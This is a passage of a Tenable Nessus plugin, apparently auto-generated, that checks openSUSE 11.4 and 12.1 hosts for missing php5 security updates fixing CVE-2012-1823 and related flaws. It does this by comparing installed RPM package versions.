openSUSE-2012-288.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74630);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/06/29 12:01:02\");\n\n script_cve_id(\"CVE-2012-1823\", \"CVE-2012-2335\", \"CVE-2012-2336\");\n\n script_name(english:\"openSUSE Security Update : php5 (openSUSE-2012-288)\");\n script_summary(english:\"Check for the openSUSE-2012-288 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The patch for CVE-2012-1823 was incomplete, this update fixes the\nremaining bits (CVE-2012-2335, CVE-2012-2336)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=755907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=761631\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php5 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-hash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4|SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4 / 12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-mod_php5-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-mod_php5-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-bcmath-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-bcmath-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-bz2-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-bz2-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-calendar-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-calendar-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-ctype-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-ctype-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-curl-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-curl-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-dba-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-dba-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-debugsource-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-devel-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-dom-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-dom-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-enchant-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-enchant-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-exif-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-exif-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-fastcgi-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-fastcgi-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-fileinfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-fileinfo-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-fpm-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-fpm-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-ftp-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-ftp-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-gd-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-gd-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-gettext-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-gettext-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-gmp-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-gmp-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-hash-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-hash-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-iconv-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-iconv-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-imap-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-imap-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-intl-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-intl-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-json-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-json-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-ldap-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-ldap-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-mbstring-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-mbstring-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-mcrypt-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-mcrypt-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-mysql-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-mysql-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-odbc-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-odbc-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-openssl-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-openssl-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-pcntl-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-pcntl-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-pdo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-pdo-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-pear-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-pgsql-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-pgsql-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-phar-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-phar-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-posix-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-posix-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-pspell-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-pspell-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-readline-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-readline-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-shmop-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-shmop-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-snmp-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-snmp-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-soap-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-soap-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-sockets-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-sockets-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-sqlite-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-sqlite-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-suhosin-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-suhosin-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-sysvmsg-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-sysvmsg-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-sysvsem-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-sysvsem-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-sysvshm-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-sysvshm-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-tidy-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-tidy-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-tokenizer-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-tokenizer-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-wddx-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-wddx-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-xmlreader-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-xmlreader-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-xmlrpc-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-xmlrpc-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-xmlwriter-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-xmlwriter-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-xsl-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-xsl-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-zip-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-zip-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-zlib-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"php5-zlib-debuginfo-5.3.5-335.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-mod_php5-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"apache2-mod_php5-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-bcmath-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-bcmath-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-bz2-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-bz2-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-calendar-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-calendar-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-ctype-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-ctype-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-curl-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-curl-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-dba-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-dba-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-debuginfo-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-debugsource-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"php5-devel-5.3.8-4.18.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", 